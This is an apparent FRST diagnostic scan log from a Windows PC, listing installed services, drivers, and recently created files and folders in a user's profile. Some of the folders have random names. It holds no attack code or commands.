S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-30] (Intel Corporation)
S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-03-13] (Intel Corporation)
S2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes)
S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [50688 2015-10-30] (HP Inc.) [File not signed]
S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [66048 2015-10-30] (HP Inc.) [File not signed]
S2 RapportMgmtService; C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2350064 2017-09-28] (IBM Corp.)
S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-08-04] (Realtek Semiconductor)
S4 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2015-07-15] (Seagate Technology LLC)
S4 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2015-07-15] (Seagate Technology LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-18] (Microsoft Corporation)
S4 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [2065808 2016-01-04] (SoftThinks SAS)
S4 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31928 2016-04-22] (Dell Inc.)
S2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [5906704 2017-07-26] (AVG Technologies CZ, s.r.o.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation)
S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2014-05-13] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4599728 2017-02-22] (Qualcomm Atheros Communications, Inc.)
S3 avgbdisk; C:\WINDOWS\system32\drivers\avgbdiska.sys [166624 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbidsdriver; C:\WINDOWS\system32\drivers\avgbidsdrivera.sys [314640 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbidsh; C:\WINDOWS\system32\drivers\avgbidsha.sys [192584 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgblog; C:\WINDOWS\system32\drivers\avgbloga.sys [336896 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbuniv; C:\WINDOWS\system32\drivers\avgbuniva.sys [51336 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgHwid; C:\WINDOWS\system32\drivers\avgHwid.sys [39424 2017-10-20] (AVG Technologies CZ, s.r.o.)
S2 avgMonFlt; C:\WINDOWS\system32\drivers\avgMonFlt.sys [140192 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgNetSec; C:\WINDOWS\system32\drivers\avgNetSec.sys [548568 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgRdr; C:\WINDOWS\system32\drivers\avgRdr2.sys [102792 2017-10-20] (AVG Technologies CZ, s.r.o.)
S0 avgRvrt; C:\WINDOWS\system32\drivers\avgRvrt.sys [76832 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgSnx; C:\WINDOWS\system32\drivers\avgSnx.sys [1022288 2017-10-26] (AVG Technologies CZ, s.r.o.)
S1 avgSP; C:\WINDOWS\system32\drivers\avgSP.sys [579584 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgStm; C:\WINDOWS\system32\drivers\avgStm.sys [193768 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgVmm; C:\WINDOWS\system32\drivers\avgVmm.sys [355856 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation)
S3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [146856 2013-06-04] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [21928 2013-06-04] (Windows (R) Win 7 DDK provider)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [33448 2016-12-07] ()
S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [21496 2016-01-14] ()
S1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-10-07] ()
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [10208 2016-07-11] () [File not signed]
S2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [192952 2017-10-07] (Malwarebytes)
S3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2017-11-04] (Malwarebytes)
S3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [45504 2017-11-04] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [252232 2017-11-04] (Malwarebytes)
S3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2017-11-10] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
S1 RapportAegle64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportAegle64.sys [384312 2017-09-28] (IBM Corp.)
S1 RapportCerberus_1804077; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1804077.sys [1271448 2017-10-01] (IBM Corp.)
S1 RapportEI64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [585432 2017-09-28] (IBM Corp.)
S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [253912 2017-09-28] (IBM Corp.)
S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [507960 2017-09-28] (IBM Corp.)
S1 RapportPG64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [610616 2017-09-28] (IBM Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2016-12-15] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-06-10] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-06-01] (AVG Netherlands B.V.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-10 16:13 - 2017-11-10 16:15 - 000030648 _____ C:\Users\Charlie\Desktop\FRST.txt
2017-11-10 16:13 - 2017-11-10 16:13 - 000000000 ____D C:\FRST
2017-11-10 16:12 - 2017-11-10 16:12 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-11-10 16:11 - 2017-11-10 16:13 - 000109624 _____ C:\WINDOWS\ntbtlog.txt
2017-11-10 14:41 - 2017-11-10 14:42 - 002403328 _____ (Farbar) C:\Users\Charlie\Desktop\FRST64.exe
2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Uxuve
2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Eflowubub
2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Aqiqliqoc
2017-11-04 11:49 - 2017-11-04 11:49 - 006547783 _____ C:\Users\Charlie\Downloads\bulletin-2431508949036.pdf
2017-11-03 10:07 - 2017-11-03 10:07 - 001434164 _____ C:\Users\Charlie\Downloads\PubsHandler.ashx
2017-11-03 09:01 - 2017-11-07 11:42 - 000000000 ____D C:\Users\Charlie\AppData\Local\Uwtes
2017-11-03 08:35 - 2017-11-03 08:35 - 000000000 ____D C:\Users\Charlie\AppData\Local\Asjam
2017-10-30 16:04 - 2017-10-30 16:11 - 007791398 _____ C:\Users\Charlie\Documents\IMG_20171030_0001.pdf
2017-10-25 20:38 - 2017-10-25 20:38 - 000389384 _____ C:\Users\Charlie\Downloads\viewDownload.go
2017-10-25 13:41 - 2017-10-25 13:41 - 000000000 ____D C:\Program Files (x86)\Dell Customer Connect
2017-10-24 09:46 - 2017-10-24 09:46 - 000210369 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017(1).pdf
2017-10-24 09:37 - 2017-10-24 09:37 - 000210358 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017.pdf
2017-10-24 09:36 - 2017-10-24 09:36 - 000146457 _____ C:\Users\Charlie\Downloads\YearEndSummary_2016.pdf
2017-10-24 09:33 - 2017-10-24 09:33 - 000514225 _____ C:\Users\Charlie\Downloads\retrievedocument.pdf
2017-10-24 09:24 - 2017-11-01 09:55 - 000031361 _____ C:\Users\Charlie\Desktop\Checks  1000.xlsx
2017-10-20 14:00 - 2017-10-20 14:00 - 000028249 _____ C:\Users\Charlie\Documents\IMG_20171020_0001.pdf
2017-10-20 13:44 - 2017-10-20 13:44 - 000209448 _____ C:\Users\Charlie\Downloads\birth cert appl_20170627.pdf
2017-10-20 06:24 - 2017-10-20 06:24 - 000402608 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2017-10-17 19:52 - 2017-10-17 19:52 - 000096098 _____ C:\Users\Charlie\Downloads\amsler_grid_eye_test.pdf
2017-10-17 07:02 - 2017-10-17 07:03 - 001361928 _____ C:\Users\Charlie\Downloads\ElfPDFStream (2).pdf
2017-10-14 10:45 - 2017-10-14 10:45 - 005668817 _____ C:\Users\Charlie\Downloads\bulletin-2431507128193.pdf
2017-10-14 10:44 - 2017-10-14 10:44 - 005108757 _____ C:\Users\Charlie\Downloads\bulletin-2431507727521.pdf
2017-10-14 10:44 - 2017-10-14 10:44 - 005108757 _____ C:\Users\Charlie\Downloads\bulletin-2431507727521(1).pdf
2017-10-13 14:07 - 2017-09-30 00:45 - 000511896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys
2017-10-13 14:07 - 2017-09-30 00:40 - 000173976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2017-10-13 14:07 - 2017-09-29 21:29 - 001408536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-10-13 14:07 - 2017-09-29 21:29 - 000804784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-10-13 14:07 - 2017-09-29 21:26 - 001333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-10-13 14:07 - 2017-09-29 21:26 - 001292872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-10-13 14:07 - 2017-09-29 21:10 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-10-13 14:07 - 2017-09-29 21:10 - 000606072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-10-13 14:07 - 2017-09-29 21:10 - 000508344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-10-13 14:07 - 2017-09-29 21:10 - 000480920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2017-10-13 14:07 - 2017-09-29 21:09 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-10-13 14:07 - 2017-09-29 21:09 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-10-13 14:07 - 2017-09-29 21:06 - 004471368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-10-13 14:07 - 2017-09-29 21:05 - 005827744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-10-13 14:07 - 2017-09-29 21:05 - 002603744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2017-10-13 14:07 - 2017-09-29 21:05 - 001266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-10-13 14:07 - 2017-09-29 21:05 - 000750488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-10-13 14:07 - 2017-09-29 21:05 - 000559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-10-13 14:07 - 2017-09-29 21:04 - 004215184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2017-10-13 14:07 - 2017-09-29 21:04 - 000612120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-10-13 14:07 - 2017-09-29 21:04 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-10-13 14:07 - 2017-09-29 21:04 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-10-13 14:07 - 2017-09-29 21:04 - 000347544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-10-13 14:07 - 2017-09-29 21:04 - 000182680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-10-13 14:07 - 2017-09-29 21:03 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-10-13 14:07 - 2017-09-29 21:03 - 006768288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-10-13 14:07 - 2017-09-29 21:03 - 001439032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-10-13 14:07 - 2017-09-29 21:02 - 001624096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.AppAgent.dll
2017-10-13 14:07 - 2017-09-29 21:02 - 001517464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2017-10-13 14:07 - 2017-09-29 21:01 - 000124544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2017-10-13 14:07 - 2017-09-29 02:45 - 002953216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-10-13 14:07 - 2017-09-29 02:43 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-10-13 14:07 - 2017-09-29 02:42 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mgmtapi.dll
2017-10-13 14:07 - 2017-09-29 02:41 - 013844992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-10-13 14:07 - 2017-09-29 02:41 - 000110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BitLockerCsp.dll
2017-10-13 14:07 - 2017-09-29 02:40 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-10-13 14:07 - 2017-09-29 02:40 - 000371200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-10-13 14:07 - 2017-09-29 02:40 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-10-13 14:07 - 2017-09-29 02:39 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 001135616 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuuc.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2017-10-13 14:07 - 2017-09-29 02:38 - 000308224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2017-10-13 14:07 - 2017-09-29 02:37 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.dll
2017-10-13 14:07 - 2017-09-29 02:37 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-10-13 14:07 - 2017-09-29 02:36 - 000590336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2017-10-13 14:07 - 2017-09-29 02:34 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-10-13 14:07 - 2017-09-29 02:34 - 000798720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-10-13 14:07 - 2017-09-29 02:34 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-10-13 14:07 - 2017-09-29 02:34 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2017-10-13 14:07 - 2017-09-29 02:33 - 007598080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-10-13 14:07 - 2017-09-29 02:33 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-10-13 14:07 - 2017-09-29 02:33 - 001506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-10-13 14:07 - 2017-09-29 02:32 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-10-13 14:07 - 2017-09-29 02:32 - 002340864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-10-13 14:07 - 2017-09-29 02:32 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-10-13 14:07 - 2017-09-29 02:32 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-10-13 14:07 - 2017-09-29 02:32 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-10-13 14:07 - 2017-09-29 02:31 - 003107328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-10-13 14:07 - 2017-09-29 02:29 - 001460736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2017-10-13 14:07 - 2017-09-29 02:29 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2017-10-13 14:07 - 2017-09-29 02:29 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-10-13 14:07 - 2017-09-29 02:28 - 000681472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2017-10-13 14:07 - 2017-09-29 02:28 - 000473088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2017-10-13 14:07 - 2017-09-29 02:28 - 000297984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2017-10-13 14:07 - 2017-09-29 02:28 - 000104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Robocopy.exe
2017-10-13 14:07 - 2017-09-29 02:28 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cipher.exe
2017-10-13 14:07 - 2017-09-29 02:24 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-10-13 14:07 - 2017-09-18 18:09 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-10-13 14:07 - 2017-09-18 17:20 - 000049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tetheringclient.dll
2017-10-13 14:07 - 2017-09-18 17:15 - 000648704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-10-13 14:06 - 2017-09-30 00:52 - 001595152 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-10-13 14:06 - 2017-09-30 00:51 - 001458320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-10-13 14:06 - 2017-09-30 00:51 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-10-13 14:06 - 2017-09-30 00:51 - 000661224 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-10-13 14:06 - 2017-09-30 00:50 - 001346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-10-13 14:06 - 2017-09-30 00:50 - 001068208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-10-13 14:06 - 2017-09-30 00:50 - 001024920 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-10-13 14:06 - 2017-09-30 00:49 - 001004136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-10-13 14:06 - 2017-09-30 00:49 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-10-13 14:06 - 2017-09-30 00:49 - 000135576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2017-10-13 14:06 - 2017-09-30 00:48 - 008319384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-10-13 14:06 - 2017-09-30 00:48 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-10-13 14:06 - 2017-09-30 00:48 - 002327448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-10-13 14:06 - 2017-09-30 00:48 - 000644696 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2017-10-13 14:06 - 2017-09-30 00:47 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-10-13 14:06 - 2017-09-30 00:47 - 001194792 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2017-10-13 14:06 - 2017-09-30 00:44 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-10-13 14:06 - 2017-09-30 00:44 - 000181912 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2017-10-13 14:06 - 2017-09-30 00:43 - 007318888 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-10-13 14:06 - 2017-09-30 00:43 - 002442136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-10-13 14:06 - 2017-09-30 00:42 - 004848952 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-10-13 14:06 - 2017-09-30 00:42 - 001506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-10-13 14:06 - 2017-09-30 00:42 - 000820120 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-10-13 14:06 - 2017-09-30 00:41 - 005477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 005304496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 002086808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 000961944 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 000654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 000651672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-10-13 14:06 - 2017-09-30 00:41 - 000259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-10-13 14:06 - 2017-09-30 00:41 - 000257432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-10-13 14:06 - 2017-09-30 00:41 - 000228248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-10-13 14:06 - 2017-09-30 00:40 - 000849816 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-10-13 14:06 - 2017-09-30 00:40 - 000724704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-10-13 14:06 - 2017-09-30 00:40 - 000701336 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-10-13 14:06 - 2017-09-30 00:40 - 000642680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-10-13 14:06 - 2017-09-30 00:40 - 000558912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-10-13 14:06 - 2017-09-30 00:40 - 000408984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-10-13 14:06 - 2017-09-30 00:40 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-10-13 14:06 - 2017-09-30 00:40 - 000184728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2017-10-13 14:06 - 2017-09-30 00:40 - 000072944 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.exe
2017-10-13 14:06 - 2017-09-30 00:39 - 021351760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-10-13 14:06 - 2017-09-30 00:39 - 001694104 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-10-13 14:06 - 2017-09-30 00:39 - 000203672 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-10-13 14:06 - 2017-09-30 00:38 - 007910072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-10-13 14:06 - 2017-09-30 00:38 - 002239136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-10-13 14:06 - 2017-09-30 00:38 - 001854872 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-10-13 14:06 - 2017-09-30 00:37 - 002377112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.AppAgent.dll
2017-10-13 14:06 - 2017-09-30 00:37 - 002229144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2017-10-13 14:06 - 2017-09-30 00:37 - 001464728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-10-13 14:06 - 2017-09-30 00:36 - 002672024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-10-13 14:06 - 2017-09-30 00:36 - 000855960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-10-13 14:06 - 2017-09-30 00:36 - 000675224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-10-13 14:06 - 2017-09-30 00:36 - 000057976 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
